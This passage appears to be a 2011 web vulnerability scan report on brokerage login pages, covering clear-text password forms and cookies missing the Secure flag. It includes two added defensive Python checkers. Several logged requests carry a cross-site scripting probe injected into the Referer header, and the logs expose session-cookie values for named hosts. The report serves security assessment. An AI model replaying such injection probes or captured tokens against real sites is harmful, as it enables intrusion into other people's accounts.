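    A form is risky when its action resolves to http://. It is also reported
    when the page itself came over http://, since a clear-text page can be
    modified in transit regardless of where the form points.
    """
    collector = _FormCollector()
    collector.feed(html)
    risky = []
    for form in collector.forms:
        if not form["passwords"]:
            continue
        action = urljoin(page_url, form["action"])   # relative actions inherit the page scheme
        if urlsplit(action).scheme == "http":
            risky.append((action, form["passwords"], "password posted over clear-text HTTP"))
        elif urlsplit(page_url).scheme == "http":
            risky.append((action, form["passwords"],
                          "login page served over HTTP; form action can be rewritten in transit"))
    return risky


# Constructed sample modelled on the form in finding 5.1.
LOGIN_HTTP = """<html><body><div id="main">
<form action="eflogin.php" method="post">
<input type="text" name="txtUsername" />
<input type="password" id="txtPassword" name="txtPassword" value="" />
<input type="submit" value="Login" />
</form></div></body></html>"""

# Constructed hardened variant: absolute https:// action, plus a form with no password.
LOGIN_HTTPS = """<html><body>
<form action="https://login.example.test/session" method="post">
<input type="text" name="user" />
<input type="password" name="passwd" />
</form>
<form action="/search" method="get"><input type="text" name="q" /></form>
</body></html>"""

if __name__ == "__main__":
    for url, doc in (("http://webstation.barchart.com/eflogin.php", LOGIN_HTTP),
                     ("https://login.example.test/", LOGIN_HTTPS),
                     ("http://login.example.test/", LOGIN_HTTPS)):
        for action, fields, reason in cleartext_password_forms(url, doc):
            print(f"{url}: {reason} (action={action}, fields={fields})")
```

The second and third runs use the same HTML; only the scheme of the page URL differs, which is exactly the distinction the remediation text makes when it says the login mechanism and everything around it should be served over TLS, not just the POST target.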


5.1. http://webstation.barchart.com/eflogin.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://webstation.barchart.com/eflogin.php. The form contains the following password field: txtPassword.

Request

GET /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.efutures.com/services/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:29 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3414
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<div id="main" >
<form action="eflogin.php" method="post">
<div id="divLogin" style="background-color: #FFFFFF; border: 2px solid #336699; height: 330px; position: absolute; width: 438px; font: 12px verdana; top: 0px;">
...[SNIP]...
</span>
<input type="password" id="txtPassword" name="txtPassword" value="" style="left: 100px; position: absolute; top: 120px; width: 150px; background-color: #eaeaea;" />
<input type="submit" value="Login" style="left: 112px; position: absolute; top: 150px; width: 50px;" />
...[SNIP]...

5.2. http://www.futurestrading.com/log-in.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.futurestrading.com
Path:   /log-in.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.futurestrading.com/log-in.html. The form contains the following password field: passwd.

Request

GET /log-in.html HTTP/1.1
Host: www.futurestrading.com
Proxy-Connection: keep-alive
Referer: http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: af954db55ff4d54a88e086fc2a1751f0=f7f0571d6de3a89fad76557c5546f2e6; __utma=221442575.134975660.1315527952.1315527952.1315530024.2; __utmb=221442575.1.10.1315530024; __utmc=221442575; __utmz=221442575.1315530024.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=futures%20trading

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:59:51 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 08 Sep 2011 19:59:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 31326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb">
<head>
<meta h
...[SNIP]...
<div id="content_inner" >
   

   <form action="/log-in.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6. SSL cookie without secure flag set
There are 54 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
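The following script reproduces the check behind findings 6.1 to 6.4 and is an added example written for this report, not Burp's code. It parses the Set-Cookie headers of an HTTPS response, reports cookies that lack the Secure attribute (and HttpOnly, since the fix lands in the same place), and grades them the way the report does: Medium when the cookie looks like a session token, Information otherwise. The session-token heuristic (a telling name or a long high-entropy value) is this script's assumption, not the scanner's. The sample headers are those of finding 6.3, except that the TLTCNT value is constructed.

```python
"""Check Set-Cookie headers on an HTTPS response for the Secure flag.

Added example; not part of the original scan report. SAMPLE_HEADERS mirrors
finding 6.3 (the TLTCNT value is constructed); the session-token heuristic
is an assumption of this script, not Burp's.
"""
import math
import re
from collections import Counter

# Cookie names that conventionally carry a session or auth token.
SESSION_NAME_HINT = re.compile(r"sess|sid|token|auth", re.I)


def _entropy_bits(value: str) -> float:
    """Shannon entropy per character; random tokens sit well above 3 bits."""
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values()) if n else 0.0


def looks_like_session_token(name: str, value: str) -> bool:
    """Heuristic: a telling name, or a long high-entropy value."""
    return bool(SESSION_NAME_HINT.search(name)) or (len(value) >= 16 and _entropy_bits(value) >= 3.0)


def audit_set_cookie(headers: list, over_https: bool = True) -> list:
    """Examine every Set-Cookie header in a list of (name, value) pairs.

    Returns one dict per cookie with its name, whether it looks like a session
    token, and the attributes it is missing. Secure only matters when the
    response came over HTTPS; HttpOnly is checked regardless.
    """
    results = []
    for hname, hvalue in headers:
        if hname.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in hvalue.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        missing = []
        if over_https and "secure" not in attrs:
            missing.append("Secure")
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        results.append({"name": name,
                        "session_like": looks_like_session_token(name, value),
                        "missing": missing})
    return results


def severity(result: dict) -> str:
    """Grade as the report does: Medium for a likely session token without
    Secure, Information for any other cookie without Secure, none otherwise."""
    if "Secure" not in result["missing"]:
        return "none"
    return "medium" if result["session_like"] else "information"


# Headers from finding 6.3; the TLTCNT value is constructed.
SAMPLE_HEADERS = [
    ("Cache-Control", "private"),
    ("Set-Cookie", "ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/"),
    ("Set-Cookie", "TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com"),
    ("Set-Cookie", "TLTCNT=DAWEB250000000000000001"),
]

# The session cookie as the remediation wants it issued.
FIXED_HEADERS = [
    ("Set-Cookie", "ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for label, hdrs in (("as observed", SAMPLE_HEADERS), ("after fix", FIXED_HEADERS)):
        print(label)
        for r in audit_set_cookie(hdrs):
            print(f"  {r['name']}: severity={severity(r)} missing={r['missing']} "
                  f"session_like={r['session_like']}")
```

One caveat the remediation text does not spell out: Secure stops the browser from sending the cookie over HTTP, but it does not by itself stop an HTTP origin on the same domain from setting a cookie of the same name; browsers have only closed that gap in later cookie-handling revisions. A session cookie therefore still needs server-side binding to the HTTPS session, as the remediation's separate-session-handling advice implies.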


6.1. https://www.optionsxpress.com/new_account.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDQCDSCTCB=DJOPBMDAGLGCJENDBNKKAEHI; path=/. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:25:16 GMT
Set-Cookie: ASPSESSIONIDQCDSCTCB=DJOPBMDAGLGCJENDBNKKAEHI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

6.2. https://www.optionsxpress.com/new_account.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDSAASBSDA=IICGFGHAGIOCHNMHCMJLCMKM; path=/. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:33 GMT
Set-Cookie: ASPSESSIONIDSAASBSDA=IICGFGHAGIOCHNMHCMJLCMKM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

6.3. https://www.optionsxpress.com/welcome.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/, TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com, and TLTCNT=DAWEB250000000000012272. The ASPSESSIONIDCSTSAQDA cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


6.4. https://account.optionsxpress.com/OpenAccount/Index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

6.5. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

6.6. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

6.7. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.8. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.9. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

6.10. https://account.optionsxpress.com/css/oxps.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

6.11. https://account.optionsxpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
